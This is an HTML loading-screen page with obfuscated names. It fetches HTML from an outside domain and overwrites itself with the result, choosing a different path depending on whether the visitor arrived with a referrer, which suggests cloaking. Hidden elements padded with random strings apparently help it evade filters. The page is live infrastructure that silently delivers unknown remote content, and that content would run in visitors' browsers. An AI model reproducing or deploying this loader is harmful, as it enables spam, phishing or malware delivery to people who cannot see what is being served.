<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .BsUzpJGER2e {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .BsUzpJGER2e .QpAfMnaF {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .BsUzpJGER2e .content {
            line-height: 50px;
            text-align: center
        }

        .BsUzpJGER2e .img {
            width: 100%
        }

        .BsUzpJGER2e .X4sS74LwkZv {
            text-align: center
        }

        .BsUzpJGER2e .X4sS74LwkZv span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .BsUzpJGER2e .X4sS74LwkZv span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .BsUzpJGER2e .X4sS74LwkZv span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .BsUzpJGER2e .X4sS74LwkZv span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .BsUzpJGER2e .X4sS74LwkZv span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .BsUzpJGER2e .X4sS74LwkZv span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .BsUzpJGER2e .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ajEaZ3rjEQ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Ih6Qa8u = ajEaZ3rjEQ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Ih6Qa8u +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Ih6Qa8u +".html?a=share";
		}
		
        ptPszp5a=url+"#"+new Date().getTime();
        ptPszp5a && function() {
            $.get(ptPszp5a, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >UJ00HOJHhJEdbp7FJQS093vsx8E8NFcyKBBUVKbMPl8JEeJ0zoV7U56PoYcD4yYkqrWa3Yd19sSuXee8ZeRiJ0</ul>
<img  src='' style='display:none'>
<p  style='display:none'>H5HNmyaggn6YNxd4ehQerWKd0tBGLXzXljN74pzcCwqA7UZRFWpJ3tPqvzJLLkeljza5ecHBYZIiZH2cN7jakHxoYr</p>
<b style='display:none' >OylMNt6SDCkikmCBe0g</b>
<span style='display:none'>lSe65oYKLnDL3hAdAFd5L5lQDWw8FnMOOeZJrLjbWPCjrDMpntzE4vobJiona0HDmcBJbsAvevtMKk0RYvaBL9kW1LpHE5Wg</span>
<span style='display:none'>lSe65oYKLnDL3hAdAFd5L5lQDWw8FnMOOeZJrLjbWPCjrDMpntzE4vobJiona0HDmcBJbsAvevtMKk0RYvaBL9kW1LpHE5Wg</span>
<img  src='' style='display:none'>
<span style='display:none'>lSe65oYKLnDL3hAdAFd5L5lQDWw8FnMOOeZJrLjbWPCjrDMpntzE4vobJiona0HDmcBJbsAvevtMKk0RYvaBL9kW1LpHE5Wg</span><div class="BsUzpJGER2e">
    <div class="QpAfMnaF">
        <div class="X4sS74LwkZv">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >tuGGnEcxy63MNUTfKk77yrdrpPxWCqr014vQPfwh9OZvJJML2rJSwHGZSVnkyNqAtlcObo</b>
<div style='display:none'>U6A2bCBIiSggpov7h2NQi1egG31ZUbZnaDZcduq0W239ewV2taVJzYv12tHczzjRFJ5z8EMha92cPdX9o</div>
<li style='display:none' >EZ9gbKzSZ9F8OmOpVdfqCxArfJ6tc8pnFY1v9oKsqab</li></body>
</html>